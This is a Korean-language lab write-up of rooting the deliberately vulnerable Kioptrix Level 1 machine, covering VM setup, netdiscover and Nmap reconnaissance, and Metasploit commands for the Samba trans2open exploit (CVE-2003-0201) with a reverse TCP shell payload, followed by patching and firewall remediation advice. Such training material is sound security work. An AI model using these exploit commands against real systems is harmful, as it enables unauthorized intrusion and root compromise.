Kioptrix Level 1: 종합 취약점 감사 및 익스플로잇
🏛️ 전문 목표
이 목표는 Kioptrix Level 1 환경에 대한 구조화된 침투 테스트를 수행하여 완전한 'root' 권한 탈취를 달성하고, Red 팀과 Blue 팀 운영 모두에 적합한 기술적 복구 전략을 문서화하는 것이었습니다.
🏗️ 환경 재현 (하드웨어 참고 사항)
최신 가상화 기본 설정은 종종 레거시 2010 커널에서 실패합니다. 이 머신을 성공적으로 부팅하고 네트워킹하려면 다음과 같은 특정 아키텍처 구성이 필요했습니다:
- OS 하위 유형: Linux / Red Hat (32-bit).
- 스토리지 아키텍처: 레거시 .vmdk 하드 드라이브를 지원하기 위해 SATA에서 IDE Controller로 전환.
- 네트워크 프로토콜: Kali Linux 공격 머신과의 내부 통신을 허용하도록 Host-only 어댑터와 함께 PCI FAST-III로 구성.
⚔️ 공격 분석 (Red Team 경로)
익스플로잇은 수동 열거(enumeration)부터 익스플로잇까지의 수명 주기를 따랐습니다:
1. 탐색 및 정찰
- Netdiscover: 대상 IP를 식별하기 위해
netdiscover -r 192.168.184.4 사용.
- Nmap 스캔: SSH (22), HTTP (80), RPC (111), NetBIOS-SSN (139)을 포함한 서비스 식별. Samba 2.2.1a가 주요 진입점으로 플래그 지정됨.
2. 익스플로잇 (Samba trans2open)
- 취약점: CVE-2003-0201 (힙 오버플로우).
- MITRE ATT&CK 매핑: - 전술: 권한 상승 (TA0004)
- 기법: 권한 상승을 위한 익스플로잇 (T1068)
- Metasploit 프로토콜:
use exploit/linux/samba/trans2open
set RHOSTS 192.168.114.5
set payload linux/x86/shell/reverse_tcp
- 결과: 리버스 셸을 성공적으로 생성.
whoami 명령이 root를 반환.
🛡️ 방어적 복구 (Blue Team 경로)
엔터프라이즈 환경을 보호하려면 다음 취약점 관리 (VM) 전략이 필수입니다:
- 패치 프로토콜: 최신 지원 버전(Samba 4.x)으로 Samba 업데이트.
call_trans2open 함수의 취약점은 모든 최신 버전에서 효과적으로 패치되었습니다.
- 네트워크 강화: 포트 139 및 445를 신뢰할 수 있는 내부 서브넷으로만 제한하도록 호스트 기반 방화벽을 배포.
- VM 역할 전략: 이 복구 조치는 표준 업무 시간 취약점 관리 주기에 해당하며, 인프라 안정성을 보장합니다.
📝 기술 증거 및 수동 로그
다음 이미지는 실제 수동 열거 및 터미널 실행을 기록한 것입니다:
대상 탐색 및 아키텍처 메모


Root 액세스 증명 (터미널 스냅샷)
Root 셸 증거